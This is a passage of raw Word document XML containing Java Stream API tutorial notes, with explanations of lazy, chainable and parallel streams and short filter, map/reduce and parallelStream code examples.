    <w:p w14:paraId="50BC1A8C" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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allows operations like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>map, filter, reduce, and collect</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to be applied to data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B535DC7" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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azy Evaluation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28417655" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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eams are evaluated lazily, meaning that operations on a stream are not executed until a terminal operation (like collect(), forEach(), etc.) is invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726568F4" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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This allows for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>efficient pipeline processing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and can improve performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37783CD2" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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hainable Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC21896" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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perations on streams are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chainable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, allowing for complex data processing in a single, concise statement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2335F33B" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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rallel Processing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C0F5DF" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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Stream API allows </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallel streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to be processed concurrently, making use of multi-core processors to improve performance for large data sets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A56B3D" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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n-Mutating:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150FED56" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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reams don't modify the source data. Operations on streams are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-mutating</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and always return a new stream or result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F10BE8E"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Basic Concepts of Stream API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606B1DE8" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ream:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086742B3" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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stream represents a sequence of elements and supports operations to process those elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C767257" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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re are two types of operations: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>intermediate</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (lazy) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>terminal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (eager).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670D5EFA" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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termediate Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070181E7" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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se operations are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lazy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning they do not execute until a terminal operation is invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE12FAA" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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s include: filter(), map(), distinct(), sorted(), peek().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEE882A" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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erminal Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EA9351" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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erminal operations </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>trigger</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the processing of the stream and return a result (or perform an action).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53225F05" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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s include: collect(), forEach(), reduce(), count(), min(), max().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A41F6D" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ource of Stream:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5685EA" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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eams can be created from various sources, such as collections, arrays, or I/O channels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415C62BC" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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mon stream sources include: Collection.stream(), Arrays.stream(), Stream.of(), etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1044A289"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Stream API in Action:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341C2C40"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1: Filtering and Collecting Elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DA5BDB"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 we filter out the numbers that are less than 5 and then collect the result into a new list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F02BAC6"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s;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C40C15"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st;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A10466A"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stream.Collectors;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6A209A" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B71BAD0"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treamExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0518BBF8"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20EFDD0E"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Integer&gt; numbers = Arrays.asList(1, 2, 3, 4, 5, 6, 7, 8, 9);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D003243" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B94F573"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sing Stream API to filter and collect the numbers greater than 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C993710"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Integer&gt; result = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE22513"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lter(n -&gt; n &gt; 5) // Intermediate operation: filter numbers greater than 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB50F96"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 // Terminal operation: collect to a list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F23C47C" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A359E77"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result); // Output: [6, 7, 8, 9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360D17C5"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F55A08E"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2FD4613"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2: Using map() and reduce() for Transformation and Aggregation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4975FC40"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 we transform a list of integers into their squares and then sum them up using map() and reduce().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5B09AE"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s;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158F2E4E"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st;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F034DD" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A28C38D"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treamExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E2B3B7"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0C1555DD"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Integer&gt; numbers = Arrays.asList(1, 2, 3, 4, 5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298BC5B8" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="722CF3CA"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sing map to square the numbers and reduce to sum them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41918551"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sum = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B454DD"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n -&gt; n * n) // Intermediate operation: square each number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F284CFE"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duce(0, Integer::sum); // Terminal operation: sum all squared numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581E9AA4" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="291F74C6"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System.out.println("Sum of squares: " + sum); // Output: Sum of squares: 55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CF98B0"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52159B9"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B7BFA7A"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3: Parallel Stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E450637"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 process the stream elements in parallel using the parallelStream() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190C5B67"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s;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1B35B8"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st;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E88944" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03E6E31A"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treamExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA3176A"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4AC61579"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Integer&gt; numbers = Arrays.asList(1, 2, 3, 4, 5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C32A63D" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E203F7D"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sing parallelStream() to process the list in parallel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26306345"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sum = numbers.parallelStream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295D2523"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n -&gt; n * n)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756665BC"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duce(0, Integer::sum);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7459DC13" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="365CABA1"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um of squares (parallel): " + sum);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C311A87"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2D37B1F"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6271214"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mon Stream Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ED5D7C" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ltering (filter())</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> elements based on a condition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04283E2F" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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stream.filter(n -&gt; n &gt; 5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E64647" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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apping (map())</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Transforms elements of the stream into another form.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B22C3EC" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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stream.map(String::toUpperCase)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC2FC12" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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orting (sorted())</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Sorts the stream elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164CEF05" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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stream.sorted()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207A5A4D" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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duction (reduce())</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Performs a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reduction</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operation, such as summing or multiplying elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E6FA64" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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stream.reduce(0, Integer::sum)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08208D92" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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llecting (collect())</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Collects the elements of the stream into a collection, such as a list, set, or map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E3D934" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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stream.collect(Collectors.toList())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37107E73" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
